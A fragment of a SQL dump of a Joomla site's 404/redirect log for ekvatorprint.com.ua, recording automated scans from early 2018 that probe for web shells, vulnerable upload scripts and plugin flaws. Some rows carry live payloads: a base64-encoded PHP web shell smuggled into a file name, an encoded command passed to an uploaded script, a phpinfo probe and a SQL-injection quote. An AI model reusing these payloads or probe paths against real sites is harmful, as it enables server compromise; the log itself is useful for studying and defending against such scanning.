00:00:00',301),(12348,'http://ekvatorprint.com.ua/modules/mod_text/helpers/view.php',NULL,'http://site.ru','',1,0,'2018-01-06 20:12:05','0000-00-00 00:00:00',301),(12349,'http://ekvatorprint.com.ua/libraries/vendor/simplepie/simplepie/idn/config.php',NULL,'http://site.ru','',2,0,'2018-01-06 21:48:47','0000-00-00 00:00:00',301),(12350,'http://ekvatorprint.com.ua/images/content-wrapper.php',NULL,'http://site.ru','',1,0,'2018-01-07 03:19:52','0000-00-00 00:00:00',301),(12351,'http://ekvatorprint.com.ua/tmp/plupload/db.php',NULL,'http://site.ru','',1,0,'2018-01-07 03:27:22','0000-00-00 00:00:00',301),(12352,'http://ekvatorprint.com.ua/components/com_weblinks/wlink.php',NULL,'http://site.ru','',1,0,'2018-01-07 04:05:16','0000-00-00 00:00:00',301),(12353,'http://ekvatorprint.com.ua/libraries/joomla/jmail.php',NULL,'http://site.ru','',3,0,'2018-01-07 05:15:19','0000-00-00 00:00:00',301),(12354,'http://ekvatorprint.com.ua/cli/run_cron.php',NULL,'http://site.ru','',1,0,'2018-01-07 05:47:24','0000-00-00 00:00:00',301),(12355,'http://ekvatorprint.com.ua/mod_config.php',NULL,'http://site.ru','',2,0,'2018-01-07 05:51:35','0000-00-00 00:00:00',301),(12356,'http://ekvatorprint.com.ua/cache/wp-post.php',NULL,'http://site.ru','',1,0,'2018-01-07 06:38:43','0000-00-00 00:00:00',301),(12357,'http://ekvatorprint.com.ua/libraries/joomla/client/http.php',NULL,'http://site.ru','',2,0,'2018-01-07 08:56:14','0000-00-00 00:00:00',301),(12358,'http://ekvatorprint.com.ua/administrator/components/com_search/views/searches/config.php',NULL,'http://site.ru','',2,0,'2018-01-07 09:31:36','0000-00-00 00:00:00',301),(12359,'http://ekvatorprint.com.ua/outpost.php',NULL,'http://site.ru','',1,0,'2018-01-07 10:10:28','0000-00-00 00:00:00',301),(12360,'http://ekvatorprint.com.ua/administrator/components/com_contenthistory/views/history/backup.php',NULL,'http://site.ru','',1,0,'2018-01-07 10:11:56','0000-00-00 00:00:00',301),(12361,'http://ekvatorprint.com.ua/print.php',NULL,'http://site.ru','',2,0,'2018-01-07 12:50:55','0000-00-00 00:00:00',301),(12362,'http://ekvatorprint.com.ua/components/com_fabrik/fabrik.php',NULL,'','',5,0,'2018-01-08 12:42:34','0000-00-00 00:00:00',301),(12363,'http://ekvatorprint.com.ua/wp-content/plugins/cherry-plugin/admin/import-export/upload.php',NULL,'','',1,0,'2018-01-08 19:04:23','0000-00-00 00:00:00',301),(12364,'http://ekvatorprint.com.ua/wp-content/plugins/google-maps-by-daniel-martyn/inuse.php',NULL,'','',1,0,'2018-01-08 19:04:29','0000-00-00 00:00:00',301),(12365,'http://ekvatorprint.com.ua/wp-content/plugins/dzs-portfolio/admin/upload.php',NULL,'','',2,0,'2018-01-08 19:05:13','0000-00-00 00:00:00',301),(12366,'http://ekvatorprint.com.ua/modules/pk_vertflexmenu/uploads/S6OBP.php',NULL,'','',2,0,'2018-01-08 19:05:38','0000-00-00 00:00:00',301),(12367,'http://ekvatorprint.com.ua/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php','',3,0,'2018-01-08 22:55:51','0000-00-00 00:00:00',301),(12368,'http://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',9,0,'2018-01-09 02:38:24','0000-00-00 00:00:00',301),(12369,'http://ekvatorprint.com.ua/libraries/joomla/database/database/print.php.suspected',NULL,'http://site.ru','',2,0,'2018-01-09 04:49:01','0000-00-00 00:00:00',301),(12370,'http://ekvatorprint.com.ua/modules/mod_manager/lang/default.php',NULL,'http://site.ru','',2,0,'2018-01-09 05:21:30','0000-00-00 00:00:00',301),(12371,'http://ekvatorprint.com.ua/includes/models.php',NULL,'http://site.ru','',1,0,'2018-01-09 05:33:17','0000-00-00 00:00:00',301),(12372,'http://ekvatorprint.com.ua/administrator/components/com_categories/views/category/config.php',NULL,'http://site.ru','',1,0,'2018-01-09 08:46:08','0000-00-00 00:00:00',301),(12373,'http://ekvatorprint.com.ua/modules/mod_archive_custom/mod_archive_custom2.php',NULL,'http://site.ru','',2,0,'2018-01-09 10:00:52','0000-00-00 00:00:00',301),(12374,'http://ekvatorprint.com.ua/administrator/includes/ini.php',NULL,'http://site.ru','',3,0,'2018-01-09 11:15:37','0000-00-00 00:00:00',301),(12375,'http://ekvatorprint.com.ua/media/editors/tinymce/skins/lightgray/img/strange.php',NULL,'http://site.ru','',3,0,'2018-01-09 11:23:39','0000-00-00 00:00:00',301),(12376,'http://ekvatorprint.com.ua/components/com_foxcontact/home.php',NULL,'http://site.ru','',3,0,'2018-01-09 11:31:34','0000-00-00 00:00:00',301),(12377,'http://ekvatorprint.com.ua/libraries/simplepie/idn/OpenIDOpenID.php',NULL,'http://site.ru','',1,0,'2018-01-09 12:47:36','0000-00-00 00:00:00',301),(12378,'http://ekvatorprint.com.ua/modules/mod_helloworld/mod_helloworld.php',NULL,'http://site.ru','',2,0,'2018-01-09 14:00:17','0000-00-00 00:00:00',301),(12379,'http://ekvatorprint.com.ua/components/com_options/models/item.php',NULL,'http://site.ru','',1,0,'2018-01-09 14:01:46','0000-00-00 00:00:00',301),(12380,'http://ekvatorprint.com.ua/components/com_source/tmpl/main.tpl.php',NULL,'http://site.ru','',1,0,'2018-01-09 14:36:07','0000-00-00 00:00:00',301),(12381,'http://ekvatorprint.com.ua/images/librareis.php',NULL,'http://site.ru','',2,0,'2018-01-09 15:14:55','0000-00-00 00:00:00',301),(12382,'http://ekvatorprint.com.ua/modules/mod_systemlogpatch/mod_systemlogpatch.php',NULL,'http://site.ru','',1,0,'2018-01-09 15:22:59','0000-00-00 00:00:00',301),(12383,'http://ekvatorprint.com.ua/administrator/components/com_banners/helpers/html/html.php',NULL,'http://site.ru','',1,0,'2018-01-09 15:56:24','0000-00-00 00:00:00',301),(12384,'http://ekvatorprint.com.ua/libraries/cms/redirecter.php',NULL,'http://site.ru','',2,0,'2018-01-09 18:56:52','0000-00-00 00:00:00',301),(12385,'http://ekvatorprint.com.ua/plugins/editors/pagenews.php',NULL,'http://site.ru','',1,0,'2018-01-09 20:37:58','0000-00-00 00:00:00',301),(12386,'http://ekvatorprint.com.ua/modules/mod_default/tmpl/template.php',NULL,'http://site.ru','',2,0,'2018-01-09 20:38:18','0000-00-00 00:00:00',301),(12387,'http://ekvatorprint.com.ua/tmp/error.php',NULL,'http://site.ru','',1,0,'2018-01-09 20:42:20','0000-00-00 00:00:00',301),(12388,'http://ekvatorprint.com.ua/components/com_taskmanager/library/task.php',NULL,'http://site.ru','',2,0,'2018-01-09 21:54:01','0000-00-00 00:00:00',301),(12389,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/www.php',NULL,'http://site.ru','',1,0,'2018-01-09 21:55:36','0000-00-00 00:00:00',301),(12390,'http://ekvatorprint.com.ua/components/com_content/setup.php.suspected',NULL,'http://site.ru','',1,0,'2018-01-10 00:18:39','0000-00-00 00:00:00',301),(12391,'http://ekvatorprint.com.ua/libraries/joomla/database/encoding.php',NULL,'http://site.ru','',3,0,'2018-01-10 00:56:47','0000-00-00 00:00:00',301),(12392,'http://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php',NULL,'http://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php','',5,0,'2018-01-10 01:44:52','0000-00-00 00:00:00',301),(12393,'http://ekvatorprint.com.ua/components/com_b2jcontact/b2jcontact.php',NULL,'','',12,0,'2018-01-10 03:11:18','0000-00-00 00:00:00',301),(12394,'http://ekvatorprint.com.ua/error_log.php',NULL,'http://site.ru','',2,0,'2018-01-10 03:20:09','0000-00-00 00:00:00',301),(12395,'http://ekvatorprint.com.ua/tmp/en-GB.php',NULL,'http://site.ru','',1,0,'2018-01-10 03:52:02','0000-00-00 00:00:00',301),(12396,'http://ekvatorprint.com.ua/media/editors/tinymce/skins/lib.php',NULL,'http://site.ru','',2,0,'2018-01-10 04:12:56','0000-00-00 00:00:00',301),(12397,'http://ekvatorprint.com.ua/bin/passphrase.php',NULL,'http://site.ru','',1,0,'2018-01-10 05:18:10','0000-00-00 00:00:00',301),(12398,'http://ekvatorprint.com.ua/components/com_tags/lvvctmu.php',NULL,'http://site.ru','',2,0,'2018-01-10 05:22:33','0000-00-00 00:00:00',301),(12399,'http://ekvatorprint.com.ua/layouts/joomla/system/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-01-10 05:59:58','0000-00-00 00:00:00',301),(12400,'http://ekvatorprint.com.ua/administrator/templates/isis/core.php',NULL,'http://site.ru','',11,0,'2018-01-10 06:39:13','0000-00-00 00:00:00',301),(12401,'http://ekvatorprint.com.ua/components/com_advertisementboard/includes/css/advertisementboard.css',NULL,'ekvatorprint.com.ua','',1,0,'2018-01-10 06:46:57','0000-00-00 00:00:00',301),(12402,'http://ekvatorprint.com.ua/libraries/joomla/application/cms.php',NULL,'http://site.ru','',1,0,'2018-01-10 09:00:53','0000-00-00 00:00:00',301),(12403,'http://ekvatorprint.com.ua/components/components.php',NULL,'http://site.ru','',2,0,'2018-01-10 10:03:41','0000-00-00 00:00:00',301),(12404,'http://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php',NULL,'http://www.google.com/','',3,0,'2018-01-10 10:50:33','0000-00-00 00:00:00',301),(12405,'http://ekvatorprint.com.ua/administrator/includes/sirine.php',NULL,'http://site.ru','',1,0,'2018-01-10 12:23:00','0000-00-00 00:00:00',301),(12406,'http://ekvatorprint.com.ua/ui-elements.php',NULL,'http://site.ru','',2,0,'2018-01-10 13:31:13','0000-00-00 00:00:00',301),(12407,'http://ekvatorprint.com.ua/images/w.php.phpgif',NULL,'http://site.ru','',2,0,'2018-01-10 14:04:46','0000-00-00 00:00:00',301),(12408,'http://ekvatorprint.com.ua/plugins/content/simplepopup.php',NULL,'http://site.ru','',2,0,'2018-01-10 14:19:37','0000-00-00 00:00:00',301),(12409,'http://ekvatorprint.com.ua/user/login',NULL,'http://ekvatorprint.com.ua/','',4,0,'2018-01-11 12:24:05','0000-00-00 00:00:00',301),(12410,'http://ekvatorprint.com.ua/printing-on-canvasПЕЧАТЬ',NULL,'','',1,0,'2018-01-11 13:55:54','0000-00-00 00:00:00',301),(12411,'http://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php',NULL,'http://www.google.com/','',3,0,'2018-01-12 02:11:29','0000-00-00 00:00:00',301),(12412,'http://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=ZWNobyAidmRhZHNmZ2RmIjs=',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=ZWNobyAidmRhZHNmZ2RmIjs=','',2,0,'2018-01-12 09:07:05','0000-00-00 00:00:00',301),(12413,'http://ekvatorprint.com.ua/media/cloud.php',NULL,'','',3,0,'2018-01-14 13:04:10','0000-00-00 00:00:00',301),(12414,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/mds_v3.php',NULL,'','',3,0,'2018-01-14 13:04:12','0000-00-00 00:00:00',301),(12415,'http://ekvatorprint.com.ua/components/com_contact/views/category/com_contact_info.php?c=phpinfo',NULL,'ekvatorprint.com.ua','',1,0,'2018-01-15 12:51:03','0000-00-00 00:00:00',301),(12416,'http://ekvatorprint.com.ua/images/side.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-01-16 08:20:02','0000-00-00 00:00:00',301),(12417,'http://ekvatorprint.com.ua/side.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-01-16 08:20:03','0000-00-00 00:00:00',301),(12418,'http://ekvatorprint.com.ua/components/com_b2jcontact/uploads/izo.php',NULL,'','',2,0,'2018-01-17 04:36:52','0000-00-00 00:00:00',301),(12419,'http://ekvatorprint.com.ua/components/com_weblinks/config.php',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/config.php','',3,0,'2018-01-17 11:14:33','0000-00-00 00:00:00',301),(12420,'http://ekvatorprint.com.ua/administrator/components/com_weblinks/config.php',NULL,'http://www.google.com/','',1,0,'2018-01-17 11:14:34','0000-00-00 00:00:00',301),(12421,'http://ekvatorprint.com.ua/.vscode/ftp-sync.json',NULL,'','',9,0,'2018-01-17 22:23:05','0000-00-00 00:00:00',301),(12422,'http://ekvatorprint.com.ua/deployment-config.json',NULL,'','',10,0,'2018-01-17 22:23:10','0000-00-00 00:00:00',301),(12423,'http://ekvatorprint.com.ua/wp-content/themes/headway-16/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-16/style.css','',3,0,'2018-01-18 09:02:04','0000-00-00 00:00:00',301),(12424,'http://ekvatorprint.com.ua/wp-content/plugins/gravityforms/',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/gravityforms/','',3,0,'2018-01-18 22:35:50','0000-00-00 00:00:00',301),(12425,'http://ekvatorprint.com.ua/var/resource_config.json',NULL,'','',1,0,'2018-01-19 05:02:36','0000-00-00 00:00:00',301),(12426,'http://ekvatorprint.com.ua/admin/Cms_Wysiwyg/directive/index/',NULL,'http://ekvatorprint.com.ua/admin/Cms_Wysiwyg/directive/index/','',1,0,'2018-01-19 07:38:06','0000-00-00 00:00:00',301),(12427,'http://ekvatorprint.com.ua/var/export/',NULL,'','',2,0,'2018-01-19 11:25:02','0000-00-00 00:00:00',301),(12428,'http://ekvatorprint.com.ua/media/joomla-update.php',NULL,'ekvatorprint.com.ua','',2,0,'2018-01-19 14:32:52','0000-00-00 00:00:00',301),(12429,'http://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ocf_x_legend.php',NULL,'http://www.google.com/','',3,0,'2018-01-20 01:33:00','0000-00-00 00:00:00',301),(12430,'http://ekvatorprint.com.ua/index.php?option=com_formmaker&task=edit_query&id=1',NULL,'http://www.google.com/','',1,0,'2018-01-21 11:13:45','0000-00-00 00:00:00',301),(12431,'http://ekvatorprint.com.ua/component/helloworld/?view=defaultview&layout=default_audio&tmpl=component&id=1',NULL,'http://www.google.com/','',1,0,'2018-01-21 12:06:38','0000-00-00 00:00:00',301),(12432,'http://ekvatorprint.com.ua/index.php?option=com_jomcomment&task=rss',NULL,'http://www.google.com/','',1,0,'2018-01-21 12:59:01','0000-00-00 00:00:00',301),(12433,'http://ekvatorprint.com.ua/index.php?option=com_pages',NULL,'http://www.google.com/','',1,0,'2018-01-21 13:51:58','0000-00-00 00:00:00',301),(12434,'http://ekvatorprint.com.ua/index.php?option=com_gallery_wd&tag_id=0\'&view=GalleryBox &gallery_id=7&theme_id=1&image_id=744',NULL,'http://www.google.com/','',1,0,'2018-01-21 14:44:38','0000-00-00 00:00:00',301),(12435,'http://ekvatorprint.com.ua/index.php?option=com_flash',NULL,'http://www.google.com/','',1,0,'2018-01-21 15:37:59','0000-00-00 00:00:00',301),(12436,'http://ekvatorprint.com.ua/component/smartshoutbox/archive?shoutauthor=1',NULL,'http://www.google.com/','',1,0,'2018-01-21 16:30:21','0000-00-00 00:00:00',301),(12437,'http://ekvatorprint.com.ua/script/suppliers.php',NULL,'http://www.google.com/','',1,0,'2018-01-21 17:20:57','0000-00-00 00:00:00',301),(12438,'http://ekvatorprint.com.ua/index.php?option=com_form2contentsearch&task=search.display&author_id=1',NULL,'http://www.google.com/','',1,0,'2018-01-21 18:13:59','0000-00-00 00:00:00',301),(12439,'http://ekvatorprint.com.ua/index.php?option=com_socialpinboard&view=likes&uid=1',NULL,'http://www.google.com/','',1,0,'2018-01-21 19:06:32','0000-00-00 00:00:00',301),(12440,'http://ekvatorprint.com.ua/index.php?option=com_advertisementboard&Itemid=132&task=show_rss_categories&catname=1',NULL,'http://www.google.com/','',1,0,'2018-01-21 20:00:13','0000-00-00 00:00:00',301),(12441,'http://ekvatorprint.com.ua/index.php?option=com_medialibrary&Itemid=20',NULL,'http://www.google.com/','',1,0,'2018-01-21 20:53:19','0000-00-00 00:00:00',301),(12442,'http://ekvatorprint.com.ua/index.php?option=com_solidres&view=reservationasset&id=8&Itemid=598',NULL,'http://www.google.com/','',1,0,'2018-01-21 21:44:53','0000-00-00 00:00:00',301),(12443,'http://ekvatorprint.com.ua/index.php?option=com_jomestate&task=detailed&ad_headline=dede&id=11',NULL,'http://www.google.com/','',1,0,'2018-01-21 22:38:41','0000-00-00 00:00:00',301),(12444,'http://ekvatorprint.com.ua/index.php?option=com_guru&view=gurubuy&lang=en',NULL,'http://www.google.com/','',1,0,'2018-01-21 23:31:35','0000-00-00 00:00:00',301),(12445,'http://ekvatorprint.com.ua/index.php?option=com_client&task=category&category=STDs&profession=Ob/Gyn',NULL,'http://www.google.com/','',1,0,'2018-01-22 00:25:50','0000-00-00 00:00:00',301),(12446,'http://ekvatorprint.com.ua/products/classified-php-script/listing',NULL,'http://www.google.com/','',1,0,'2018-01-22 01:17:58','0000-00-00 00:00:00',301),(12447,'http://ekvatorprint.com.ua/components/com_weblinks/metadata.php',NULL,'http://www.google.com/','',2,0,'2018-01-22 01:31:28','0000-00-00 00:00:00',301),(12448,'http://ekvatorprint.com.ua/zechat-php-script/login.php',NULL,'http://www.google.com/','',1,0,'2018-01-22 02:10:19','0000-00-00 00:00:00',301),(12449,'http://ekvatorprint.com.ua/wchat-php-script/login.php',NULL,'http://www.google.com/','',1,0,'2018-01-22 03:01:30','0000-00-00 00:00:00',301),(12450,'http://ekvatorprint.com.ua/site_search.php',NULL,'http://www.google.com/','',1,0,'2018-01-22 03:53:12','0000-00-00 00:00:00',301),(12451,'http://ekvatorprint.com.ua/index.php?option=com_jquickcontact',NULL,'http://www.google.com/','',1,0,'2018-01-22 04:44:49','0000-00-00 00:00:00',301),(12452,'http://ekvatorprint.com.ua/index.php?option=com_jgive&view=campaigns',NULL,'http://www.google.com/','',1,0,'2018-01-22 05:39:43','0000-00-00 00:00:00',301),(12453,'http://ekvatorprint.com.ua/index.php?option=com_vis&task=2',NULL,'http://www.google.com/','',1,0,'2018-01-22 06:33:09','0000-00-00 00:00:00',301),(12454,'http://ekvatorprint.com.ua/index.php?option=com_carocci&task=schedarivista',NULL,'http://www.google.com/','',1,0,'2018-01-22 07:26:08','0000-00-00 00:00:00',301),(12455,'http://ekvatorprint.com.ua/index.php?option=com_student&view=student',NULL,'http://www.google.com/','',1,0,'2018-01-22 08:19:08','0000-00-00 00:00:00',301),(12456,'http://ekvatorprint.com.ua/index.php?option=com_paper&NO=1',NULL,'http://www.google.com/','',1,0,'2018-01-22 09:12:55','0000-00-00 00:00:00',301),(12457,'http://ekvatorprint.com.ua/index.php?option=com_maisons&view=detail&Itemid=1',NULL,'http://www.google.com/','',1,0,'2018-01-22 10:06:49','0000-00-00 00:00:00',301),(12458,'http://ekvatorprint.com.ua/index.php?option=com_camps&view=wrapper&Itemid=17',NULL,'http://www.google.com/','',1,0,'2018-01-22 10:59:58','0000-00-00 00:00:00',301),(12459,'http://ekvatorprint.com.ua/index.php?option=com_monos&view=detail&Itemid=27&n=1290&h=1',NULL,'http://www.google.com/','',1,0,'2018-01-22 11:53:03','0000-00-00 00:00:00',301),(12460,'http://ekvatorprint.com.ua/index.php?option=com_photographic&view=gallery&layout=image&id=2',NULL,'http://www.google.com/','',1,0,'2018-01-22 12:45:53','0000-00-00 00:00:00',301),(12461,'http://ekvatorprint.com.ua/index.php?option=com_cck&view=list',NULL,'http://www.google.com/','',1,0,'2018-01-22 13:39:56','0000-00-00 00:00:00',301),(12462,'http://ekvatorprint.com.ua/index.php?option=com_restaurant&view=sponsorspage',NULL,'http://www.google.com/','',1,0,'2018-01-22 15:24:09','0000-00-00 00:00:00',301),(12463,'http://ekvatorprint.com.ua/404error-test-page-by-turbo-website-reviewer',NULL,'http://www.google.com/','',1,0,'2018-01-22 17:56:17','0000-00-00 00:00:00',301),(12464,'http://ekvatorprint.com.ua/upload/server/php/',NULL,'http://ekvatorprint.com.ua/upload/server/php/','',1,0,'2018-01-23 03:04:35','0000-00-00 00:00:00',301),(12465,'http://ekvatorprint.com.ua/tmp/plain;base64,PD9waHAgQGFzc2VydChAYmFzZTY0X2RlY29kZShAc3RyX3JvdDEzKCRfUE9TVFsiZGF0YSJdKSkpO2RpZTs7Pz4=;.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-01-23 14:14:17','0000-00-00 00:00:00',301),(12466,'http://ekvatorprint.com.ua/jquery-file-upload/server/php/',NULL,'http://ekvatorprint.com.ua/jquery-file-upload/server/php/','',1,0,'2018-01-24 15:48:34','0000-00-00 00:00:00',301),(12467,'http://ekvatorprint.com.ua/components/com_adsmanager/js/noconflict.js',NULL,'','',7,0,'2018-01-26 20:01:50','0000-00-00 00:00:00',301),(12468,'http://ekvatorprint.com.ua/plugins/community/uploadify/uploadify.css',NULL,'','',1,0,'2018-01-27 05:33:35','0000-00-00 00:00:00',301),(12469,'http://ekvatorprint.com.ua/libraries/pGSQ.php',NULL,'http://site.ru','',2,0,'2018-01-29 11:05:24','0000-00-00 00:00:00',301),(12470,'http://ekvatorprint.com.ua/components/com_b2jcontact/x0x04.php',NULL,'http://site.ru','',3,0,'2018-01-29 11:25:05','0000-00-00 00:00:00',301),(12471,'http://ekvatorprint.com.ua/libraries/phputf8/utils/test.php',NULL,'http://site.ru','',1,0,'2018-01-29 11:25:38','0000-00-00 00:00:00',301),(12472,'http://ekvatorprint.com.ua/tags.php',NULL,'http://site.ru','',1,0,'2018-01-29 12:51:52','0000-00-00 00:00:00',301),(12473,'http://ekvatorprint.com.ua/media/system/css/shewil!.php',NULL,'http://site.ru','',2,0,'2018-01-29 14:31:06','0000-00-00 00:00:00',301),(12474,'http://ekvatorprint.com.ua/tmp/Wso.php',NULL,'http://site.ru','',3,0,'2018-01-29 15:00:08','0000-00-00 00:00:00',301),(12475,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.4/Marvins.php',NULL,'http://site.ru','',1,0,'2018-01-29 16:18:01','0000-00-00 00:00:00',301),(12476,'http://ekvatorprint.com.ua/language/en-GB/error.php',NULL,'http://site.ru','',4,0,'2018-01-29 16:32:08','0000-00-00 00:00:00',301),(12477,'http://ekvatorprint.com.ua/components/com_foxcontact/b0x.php',NULL,'http://site.ru','',2,0,'2018-01-29 16:55:57','0000-00-00 00:00:00',301),(12478,'http://ekvatorprint.com.ua/wp-caches.php',NULL,'http://site.ru','',5,0,'2018-01-29 17:13:23','0000-00-00 00:00:00',301),(12479,'http://ekvatorprint.com.ua/components/s.php',NULL,'http://site.ru','',2,0,'2018-01-29 18:40:47','0000-00-00 00:00:00',301),(12480,'http://ekvatorprint.com.ua/components/sec.php',NULL,'http://site.ru','',2,0,'2018-01-30 05:18:16','0000-00-00 00:00:00',301),(12481,'http://ekvatorprint.com.ua/administrator/cache/theme.php',NULL,'http://site.ru','',1,0,'2018-01-30 07:22:29','0000-00-00 00:00:00',301),(12482,'http://ekvatorprint.com.ua/stats/wp-caches.php',NULL,'http://site.ru','',1,0,'2018-01-30 12:09:40','0000-00-00 00:00:00',301),(12483,'http://ekvatorprint.com.ua/modules/mod_photocomments/tmpl/logo_img.php.suspected',NULL,'http://site.ru','',2,0,'2018-01-30 13:10:16','0000-00-00 00:00:00',301),(12484,'http://ekvatorprint.com.ua/components/Marvins.php',NULL,'http://site.ru','',1,0,'2018-01-30 14:05:27','0000-00-00 00:00:00',301),(12485,'http://ekvatorprint.com.ua/images/stories/ok.php',NULL,'http://site.ru','',1,0,'2018-01-31 00:39:49','0000-00-00 00:00:00',301),(12486,'http://ekvatorprint.com.ua/bacot.php',NULL,'http://site.ru','',3,0,'2018-01-31 00:55:25','0000-00-00 00:00:00',301),(12487,'http://ekvatorprint.com.ua/components/com_foxcontact/config.php',NULL,'http://site.ru','',1,0,'2018-01-31 02:04:24','0000-00-00 00:00:00',301),(12488,'http://ekvatorprint.com.ua/images/stories/me.php',NULL,'http://site.ru','',2,0,'2018-01-31 05:55:51','0000-00-00 00:00:00',301),(12489,'http://ekvatorprint.com.ua/server/php/',NULL,'http://ekvatorprint.com.ua/server/php/','',2,0,'2018-01-31 06:14:06','0000-00-00 00:00:00',301),(12490,'http://ekvatorprint.com.ua/prom.php',NULL,'http://site.ru','',1,0,'2018-01-31 08:03:54','0000-00-00 00:00:00',301),(12491,'http://ekvatorprint.com.ua/xGASUPx.php',NULL,'http://site.ru','',1,0,'2018-01-31 12:43:44','0000-00-00 00:00:00',301),(12492,'http://ekvatorprint.com.ua/downloads/logo_img.php',NULL,'http://site.ru','',2,0,'2018-01-31 14:17:41','0000-00-00 00:00:00',301),(12493,'http://ekvatorprint.com.ua/plugins/editors/jce/tiny_mce/plugins/advcode/img/debug.php',NULL,'http://site.ru','',2,0,'2018-02-01 09:47:37','0000-00-00 00:00:00',301),(12494,'http://ekvatorprint.com.ua/old/libraries/system_info.php',NULL,'http://site.ru','',2,0,'2018-02-01 09:48:19','0000-00-00 00:00:00',301),(12495,'http://ekvatorprint.com.ua/language/overrides/wp-logins.php',NULL,'http://site.ru','',1,0,'2018-02-01 09:49:03','0000-00-00 00:00:00',301),(12496,'http://ekvatorprint.com.ua/xmlrpc/dlrejt.php',NULL,'http://site.ru','',1,0,'2018-02-01 09:51:21','0000-00-00 00:00:00',301),(12497,'http://ekvatorprint.com.ua/wp-press.php',NULL,'http://site.ru','',1,0,'2018-02-01 09:51:41','0000-00-00 00:00:00',301),(12498,'http://ekvatorprint.com.ua/administrator/components/com_content/wqcuc.php',NULL,'http://site.ru','',1,0,'2018-02-01 10:02:36','0000-00-00 00:00:00',301),(12499,'http://ekvatorprint.com.ua/libraries/legacy/finzbfb.php',NULL,'http://site.ru','',4,0,'2018-02-01 10:08:00','0000-00-00 00:00:00',301),(12500,'http://ekvatorprint.com.ua/administrator/components/com_extplorer/scripts/extjs3/resources/images/default/progress/404.php',NULL,'http://site.ru','',1,0,'2018-02-01 10:19:34','0000-00-00 00:00:00',301),(12501,'http://ekvatorprint.com.ua/star/plugins/vmpayment/standard/language/en-GB/kimwv.php',NULL,'http://site.ru','',1,0,'2018-02-01 10:38:40','0000-00-00 00:00:00',301),(12502,'http://ekvatorprint.com.ua/administrator/components/com_uniform/language/admin/de-DE/sky.php',NULL,'http://site.ru','',2,0,'2018-02-01 10:44:53','0000-00-00 00:00:00',301),(12503,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/example_dependency/debug.php',NULL,'http://site.ru','',2,0,'2018-02-01 10:45:44','0000-00-00 00:00:00',301),(12504,'http://ekvatorprint.com.ua/templates/beez/wso.php',NULL,'http://site.ru','',2,0,'2018-02-01 10:46:17','0000-00-00 00:00:00',301),(12505,'http://ekvatorprint.com.ua/joomla/administrator/templates/khepri/images/menu/sql-ou.php',NULL,'http://site.ru','',1,0,'2018-02-01 10:46:18','0000-00-00 00:00:00',301),(12506,'http://ekvatorprint.com.ua/templates/protostar/images/system/c.php',NULL,'http://site.ru','',2,0,'2018-02-01 10:48:31','0000-00-00 00:00:00',301),(12507,'http://ekvatorprint.com.ua/joomla/modules/mod_poll/tmpl/debug.php',NULL,'http://site.ru','',1,0,'2018-02-01 10:55:23','0000-00-00 00:00:00',301),(12508,'http://ekvatorprint.com.ua/libraries/joomla/application/WSO789.php',NULL,'http://site.ru','',1,0,'2018-02-01 10:57:55','0000-00-00 00:00:00',301),(12509,'http://ekvatorprint.com.ua/components/com_tags/sijmuqi.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:45:22','0000-00-00 00:00:00',301),(12510,'http://ekvatorprint.com.ua/templates/beez5/fso.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:46:41','0000-00-00 00:00:00',301),(12511,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/nsis/pouimeq.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:51:33','0000-00-00 00:00:00',301),(12512,'http://ekvatorprint.com.ua/seller82_5421508cdcc345075ecbf9bdd905afeb.php',NULL,'http://site.ru','',1,0,'2018-02-01 13:02:00','0000-00-00 00:00:00',301),(12513,'http://ekvatorprint.com.ua/components/com_banners/models/Dwsonv.php',NULL,'http://site.ru','',1,0,'2018-02-01 13:02:06','0000-00-00 00:00:00',301),(12514,'http://ekvatorprint.com.ua/templates/beez5/-.php',NULL,'http://site.ru','',2,0,'2018-02-01 13:04:36','0000-00-00 00:00:00',301),(12515,'http://ekvatorprint.com.ua/administrator/components/com_media/models/forms/uhnde.php',NULL,'http://site.ru','',1,0,'2018-02-01 13:05:13','0000-00-00 00:00:00',301),(12516,'http://ekvatorprint.com.ua/layouts/dxhox.php',NULL,'http://site.ru','',2,0,'2018-02-01 13:05:48','0000-00-00 00:00:00',301),(12517,'http://ekvatorprint.com.ua/administrator/components/com_sigpro/views/okkas.php',NULL,'http://site.ru','',4,0,'2018-02-01 13:25:09','0000-00-00 00:00:00',301),(12518,'http://ekvatorprint.com.ua/templates/atomic/b0xed.php',NULL,'http://site.ru','',2,0,'2018-02-01 13:59:08','0000-00-00 00:00:00',301),(12519,'http://ekvatorprint.com.ua/administrator/components/com_users/models/debug.php',NULL,'http://site.ru','',1,0,'2018-02-01 13:59:57','0000-00-00 00:00:00',301),(12520,'http://ekvatorprint.com.ua/administrator/templates/hathor/language/en-GB/j_ajax.php',NULL,'http://site.ru','',1,0,'2018-02-01 14:00:15','0000-00-00 00:00:00',301),(12521,'http://ekvatorprint.com.ua/administrator/components/com_admintools/views/fixpermsconfig/tmpl/plmrmb.php',NULL,'http://site.ru','',1,0,'2018-02-01 